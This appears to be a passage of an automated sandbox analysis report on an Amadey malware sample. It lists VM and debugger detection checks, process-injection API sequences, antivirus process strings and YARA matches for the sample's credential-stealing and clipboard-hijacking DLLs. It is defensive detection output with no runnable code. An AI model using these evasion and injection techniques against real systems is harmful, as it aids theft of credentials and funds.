Source: Amcache.hve.3.dr Binary or memory string: VMware
Source: Amcache.hve.3.dr Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.3.dr Binary or memory string: vmci.syshbin
Source: Amcache.hve.3.dr Binary or memory string: VMware, Inc.
Source: Amcache.hve.3.dr Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.3.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.3.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.3.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Dctooux.exe, 0000001C.00000003.2467481991.0000000002EE3000.00000004.00000020.00020000.00000000.sdmp, Dctooux.exe, 0000001C.00000002.2886494083.0000000002EAC000.00000004.00000020.00020000.00000000.sdmp, Dctooux.exe, 0000001C.00000002.2886494083.0000000002EE3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Amcache.hve.3.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.3.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.3.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.3.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.3.dr Binary or memory string: vmci.sys
Source: Amcache.hve.3.dr Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.3.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.3.dr Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.3.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.3.dr Binary or memory string: VMware20,1
Source: Amcache.hve.3.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.3.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.3.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.3.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.3.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.3.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.3.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.3.dr Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.3.dr Binary or memory string: VMware Virtual RAM
Source: c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe, 00000000.00000002.1842701092.00000000069BB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}cr
Source: Amcache.hve.3.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.3.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Process queried: DebugPort
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Code function: 0_2_00439DBE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00439DBE
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Code function: 0_2_0042F2A9 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_0042F2A9
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Code function: 0_2_0043D5A2 mov eax, dword ptr fs:[00000030h] 0_2_0043D5A2
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Code function: 0_2_0043983B mov eax, dword ptr fs:[00000030h] 0_2_0043983B
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Code function: 0_2_02F79AA2 mov eax, dword ptr fs:[00000030h] 0_2_02F79AA2
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Code function: 0_2_02F7D809 mov eax, dword ptr fs:[00000030h] 0_2_02F7D809
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Code function: 0_2_02F4092B mov eax, dword ptr fs:[00000030h] 0_2_02F4092B
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Code function: 0_2_02F40D90 mov eax, dword ptr fs:[00000030h] 0_2_02F40D90
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Code function: 0_2_02FF306B push dword ptr fs:[00000030h] 0_2_02FF306B
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 20_2_0043D5A2 mov eax, dword ptr fs:[00000030h] 20_2_0043D5A2
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 20_2_0043983B mov eax, dword ptr fs:[00000030h] 20_2_0043983B
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 20_2_02F29AA2 mov eax, dword ptr fs:[00000030h] 20_2_02F29AA2
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 20_2_02F2D809 mov eax, dword ptr fs:[00000030h] 20_2_02F2D809
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 20_2_02EF092B mov eax, dword ptr fs:[00000030h] 20_2_02EF092B
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 20_2_02EF0D90 mov eax, dword ptr fs:[00000030h] 20_2_02EF0D90
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 20_2_02F93033 push dword ptr fs:[00000030h] 20_2_02F93033
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 28_2_0043D5A2 mov eax, dword ptr fs:[00000030h] 28_2_0043D5A2
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 28_2_0043983B mov eax, dword ptr fs:[00000030h] 28_2_0043983B
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 28_2_02E2454B push dword ptr fs:[00000030h] 28_2_02E2454B
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 28_2_048C0D90 mov eax, dword ptr fs:[00000030h] 28_2_048C0D90
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 28_2_048FD809 mov eax, dword ptr fs:[00000030h] 28_2_048FD809
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 28_2_048C092B mov eax, dword ptr fs:[00000030h] 28_2_048C092B
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 28_2_048F9AA2 mov eax, dword ptr fs:[00000030h] 28_2_048F9AA2
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 28_2_00442103 GetProcessHeap, 28_2_00442103
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Code function: 0_2_0042102F SetUnhandledExceptionFilter, 0_2_0042102F
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Code function: 0_2_004204FC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_004204FC
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Code function: 0_2_00439DBE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00439DBE
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Code function: 0_2_00420ECA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00420ECA
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Code function: 0_2_02F7A025 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_02F7A025
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Code function: 0_2_02F61131 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_02F61131
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Code function: 0_2_02F60763 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_02F60763
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 20_2_004204FC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 20_2_004204FC
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 20_2_00439DBE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 20_2_00439DBE
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 20_2_00420ECA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 20_2_00420ECA
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 20_2_02F2A025 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 20_2_02F2A025
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 20_2_02F11131 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 20_2_02F11131
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 20_2_02F10763 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 20_2_02F10763
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 28_2_004204FC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 28_2_004204FC
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 28_2_00420ECA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 28_2_00420ECA
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 28_2_0042102F SetUnhandledExceptionFilter, 28_2_0042102F
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 28_2_00439DBE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 28_2_00439DBE
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 28_2_048E0763 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 28_2_048E0763
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 28_2_048FA025 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 28_2_048FA025
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 28_2_048E1131 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 28_2_048E1131

HIPS / PFW / Operating System Protection Evasion
barindex
Contains functionality to inject code into remote processes
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Code function: 0_2_004074F0 GetModuleFileNameA,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree, 0_2_004074F0
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Process created: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe "C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Process created: unknown unknown
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Code function: 0_2_004210B6 cpuid 0_2_004210B6
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Queries volume information: C:\Users\user\AppData\Roaming\810b84e2bfa3a9\cred64.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Queries volume information: C:\Users\user\AppData\Roaming\810b84e2bfa3a9\cred64.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Queries volume information: C:\Users\user\AppData\Roaming\810b84e2bfa3a9\clip64.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Queries volume information: C:\Users\user\AppData\Roaming\810b84e2bfa3a9\clip64.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Code function: 0_2_0040B385 CoInitialize,CoCreateInstance,CoUninitialize,CoUninitialize,CoUninitialize,GetLocalTime,CoUninitialize,CoInitialize,CoCreateInstance,CoUninitialize, 0_2_0040B385
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Code function: 0_2_0040B2B0 GetUserNameA, 0_2_0040B2B0
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Code function: 0_2_00408180 GetVersionExW,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo, 0_2_00408180
AV process strings found (often used to terminate AV products)
Source: Amcache.hve.3.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.3.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.3.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.3.dr Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information
barindex
Yara detected Amadey
Source: Yara match File source: Process Memory Space: Dctooux.exe PID: 7652, type: MEMORYSTR
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Yara detected Amadeys Clipper DLL
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\clip64[1].dll, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\810b84e2bfa3a9\clip64.dll, type: DROPPED
Yara detected Amadeys stealer DLL
Source: Yara match File source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.3.Dctooux.exe.4930000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.Dctooux.exe.2ef0e67.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.3.Dctooux.exe.4920000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.Dctooux.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.2f40e67.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.Dctooux.exe.48c0e67.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.4980000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.Dctooux.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.2f40e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.Dctooux.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.4980000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.Dctooux.exe.2ef0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.3.Dctooux.exe.4930000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.Dctooux.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.Dctooux.exe.48c0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.3.Dctooux.exe.4920000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001C.00000003.2347714328.0000000004930000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.2885045669.0000000000400000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1841496983.0000000002F40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.1736015546.0000000004920000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1644313832.0000000004980000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.2886785798.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.1846693289.0000000000400000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.1848101190.0000000002EF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1839369180.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\clip64[1].dll, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\810b84e2bfa3a9\clip64.dll, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\cred64[1].dll, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\810b84e2bfa3a9\cred64.dll, type: DROPPED
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Code function: 0_2_00431261 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext, 0_2_00431261
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Code function: 0_2_00431F58 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext, 0_2_00431F58
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Code function: 0_2_02F721BF Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext, 0_2_02F721BF
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Code function: 0_2_02F714C8 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext, 0_2_02F714C8
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 20_2_00431261 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext, 20_2_00431261
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 20_2_00431F58 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext, 20_2_00431F58
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 20_2_02F221BF Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext, 20_2_02F221BF
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 20_2_02F214C8 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext, 20_2_02F214C8
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 28_2_00402340 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ, 28_2_00402340
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 28_2_00431261 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext, 28_2_00431261
